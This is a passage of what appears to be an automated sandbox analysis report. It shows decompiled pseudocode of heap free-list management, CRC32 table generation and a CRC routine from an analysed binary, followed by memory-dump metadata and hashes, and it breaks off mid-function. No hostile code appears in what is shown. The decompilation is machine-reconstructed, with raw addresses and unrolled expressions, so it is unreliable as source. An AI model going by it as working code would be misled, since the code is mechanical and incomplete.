                              							if(_t234 >= 0) {
                              								__eflags = _a11;
                              								if(_a11 == 0) {
                              									_t237 = _a4;
                              									_t176 = _t237 + 4;
                              									 *_t176 =  *(_t237 + 4) | 0x80000000 >> _t295 - 0x00000020;
                              									__eflags =  *_t176;
                              								}
                              								_t189 = _t186 + 0xc4 + _t274 * 4;
                              								_t235 = _t295 - 0x20;
                              								_t275 = 0x80000000;
                              							} else {
                              								__eflags = _a11;
                              								if(_a11 == 0) {
                              									_t239 = _a4;
                              									 *_t239 =  *_t239 | 0x80000000 >> _t295;
                              									__eflags =  *_t239;
                              								}
                              								_t189 = _t186 + 0x44 + _t274 * 4;
                              								_t275 = 0x80000000;
                              								_t235 = _t295;
                              							}
                              							 *_t189 =  *_t189 | _t275 >> _t235;
                              							__eflags =  *_t189;
                              						}
                              						_t188 = _a12;
                              						 *_t196 = _t188;
                              						 *((intOrPtr*)(_t188 + _t196 - 4)) = _t188;
                              					}
                              					L52:
                              					_t187 = 1;
                              					return _t187;
                              				}
                              				if((_t194 & 0x00000001) != 0 || _t292 > _t194 + _t227) {
                              					return 0;
                              				} else {
                              					_t250 = (_v8 >> 4) - 1;
                              					_v12 = _t250;
                              					if(_t250 > 0x3f) {
                              						_t250 = 0x3f;
                              						_v12 = _t250;
                              					}
                              					if( *((intOrPtr*)(_t281 + 4)) ==  *((intOrPtr*)(_t281 + 8))) {
                              						if(_t250 >= 0x20) {
                              							_t267 = _v12 + _t186 + 4;
                              							_t218 =  !(0x80000000 >> _t250 + 0xffffffe0);
                              							 *(_t186 + 0xc4 + _t274 * 4) =  *(_t186 + 0xc4 + _t274 * 4) & 0x80000000;
                              							 *_t267 =  *_t267 - 1;
                              							__eflags =  *_t267;
                              							if( *_t267 == 0) {
                              								_t268 = _a4;
                              								_t44 = _t268 + 4;
                              								 *_t44 =  *(_t268 + 4) & _t218;
                              								__eflags =  *_t44;
                              							}
                              						} else {
                              							_t270 = _v12 + _t186 + 4;
                              							_t221 =  !(0x80000000 >> _t250);
                              							 *(_t186 + 0x44 + _t274 * 4) =  *(_t186 + 0x44 + _t274 * 4) & 0x80000000;
                              							 *_t270 =  *_t270 - 1;
                              							if( *_t270 == 0) {
                              								 *_a4 =  *_a4 & _t221;
                              							}
                              						}
                              					}
                              					 *((intOrPtr*)( *((intOrPtr*)(_t281 + 8)) + 4)) =  *((intOrPtr*)(_t281 + 4));
                              					 *((intOrPtr*)( *((intOrPtr*)(_t281 + 4)) + 8)) =  *((intOrPtr*)(_t281 + 8));
                              					_v8 = _v8 + _a12 - _t292;
                              					if(_v8 <= 0) {
                              						_t277 = _a8;
                              					} else {
                              						_t290 = (_v8 >> 4) - 1;
                              						_t256 = _a8 + _t292 - 4;
                              						if(_t290 > 0x3f) {
                              							_t290 = 0x3f;
                              						}
                              						_t207 = _v16 + _t290 * 8;
                              						_a12 = _t207;
                              						 *((intOrPtr*)(_t256 + 4)) =  *((intOrPtr*)(_t207 + 4));
                              						_t209 = _a12;
                              						 *(_t256 + 8) = _t209;
                              						 *((intOrPtr*)(_t209 + 4)) = _t256;
                              						 *((intOrPtr*)( *((intOrPtr*)(_t256 + 4)) + 8)) = _t256;
                              						if( *((intOrPtr*)(_t256 + 4)) ==  *(_t256 + 8)) {
                              							_t258 =  *((intOrPtr*)(_t290 + _t186 + 4));
                              							_a15 = _t258;
                              							_t259 = _t258 + 1;
                              							 *((char*)(_t290 + _t186 + 4)) = _t259;
                              							if(_t259 >= 0) {
                              								__eflags = _a15;
                              								if(_a15 == 0) {
                              									_t84 = _t290 - 0x20; // -33
                              									_t262 = _a4;
                              									_t86 = _t262 + 4;
                              									 *_t86 =  *(_t262 + 4) | 0x80000000 >> _t84;
                              									__eflags =  *_t86;
                              								}
                              								_t193 = _t186 + 0xc4 + _t274 * 4;
                              								_t91 = _t290 - 0x20; // -33
                              								_t260 = _t91;
                              								_t278 = 0x80000000;
                              							} else {
                              								if(_a15 == 0) {
                              									 *_a4 =  *_a4 | 0x80000000 >> _t290;
                              								}
                              								_t193 = _t186 + 0x44 + _t274 * 4;
                              								_t278 = 0x80000000;
                              								_t260 = _t290;
                              							}
                              							 *_t193 =  *_t193 | _t278 >> _t260;
                              						}
                              						_t277 = _a8;
                              						_t257 = _v8;
                              						_t192 = _t277 + _t292 - 4;
                              						 *_t192 = _t257;
                              						 *(_t257 + _t192 - 4) = _t257;
                              					}
                              					_t191 = _t292 + 1;
                              					 *((intOrPtr*)(_t277 - 4)) = _t191;
                              					 *((intOrPtr*)(_t277 + _t292 - 8)) = _t191;
                              					goto L52;
                              				}
                              			}


                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • Opcode ID: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
                              • Instruction ID: ff32ffadf5a964956f90e5d4d875ac86f6d3b74cc38b5144254d495ff0ae7514
                              • Opcode Fuzzy Hash: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
                              • Instruction Fuzzy Hash: D3B18E75A0020ADFDB15CF04C5D0AE9BBA2BF58318F25C19EC85A4B346C735EE82CB94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00403A01() {
                              				void* _t37;
                              				signed int _t38;
                              				signed int _t72;
                              
                              				_t72 = 0;
                              				do {
                              					 *(0x4236c0 + _t72 * 4) =  !((( !((( !((( !((( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 
0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ 
_t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 
0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ 
_t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 
0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ 
_t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 
0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001;
                              					_t72 = _t72 + 1;
                              				} while (_t72 < 0x100);
                              				while(_t72 < 0x800) {
                              					_t38 =  *(0x4232c0 + _t72 * 4);
                              					_t72 = _t72 + 1;
                              					 *(0x4236bc + _t72 * 4) = _t38 >> 0x00000008 ^  *(0x4236c0 + (_t38 & 0x000000ff) * 4);
                              				}
                              				 *0x42333c = 0x418fd0;
                              				_t37 = E00411420();
                              				if(_t37 == 0) {
                              					 *0x42333c = 0x418ef0;
                              					return _t37;
                              				}
                              				return _t37;
                              			}







                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • Opcode ID: 951ce894d9222124d4953917d4d44c2f3af61f07f2abcd4f63f3fcd2ee4f65ae
                              • Instruction ID: b54c2cd6cfa36051406bb29028bc26d5c271240bfac9ba2f52dccebc7510b76a
                              • Opcode Fuzzy Hash: 951ce894d9222124d4953917d4d44c2f3af61f07f2abcd4f63f3fcd2ee4f65ae
                              • Instruction Fuzzy Hash: 52214F3E370D0607A71C8B69AD336B921D2E38430A7C8A03DE68BC53D1EE6CD595860D
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00418EF1(signed char __ecx, signed int __edx, intOrPtr _a8, intOrPtr _a12) {
                              				signed char _t42;
                              				signed int _t44;
                              				signed int _t50;
                              				signed int _t51;
                              				unsigned int _t59;
                              				signed char _t60;
                              				signed int _t62;
                              				void* _t63;
                              				intOrPtr _t65;
                              				intOrPtr _t67;
                              				signed int _t69;
                              				signed int _t73;
                              				signed int _t83;
                              				intOrPtr _t86;
                              
                              				_t62 = __edx;
                              				_t42 = __ecx;
                              				_t65 = _a8;
                              				_t86 = _a12;
                              				if(_t65 != 0) {
                              					while((_t62 & 0x00000007) != 0) {
                              						_t83 =  *_t62 & 0x000000ff;
                              						_t62 = _t62 + 1;
                              						_t42 = _t42 >> 0x00000008 ^  *(_t86 + (_t83 ^ _t42 & 0x000000ff) * 4);
                              						_t65 = _t65 - 1;
                              						if(_t65 != 0) {
                              							continue;
                              						}
                              						break;
                              					}
                              					if(_t65 >= 0x10) {
                              						_t67 = _t65 + _t62;
                              						_a8 = _t67;
                              						_t69 = _t67 - 0x00000008 & 0xfffffff8;
                              						_t63 = _t62 - _t69;
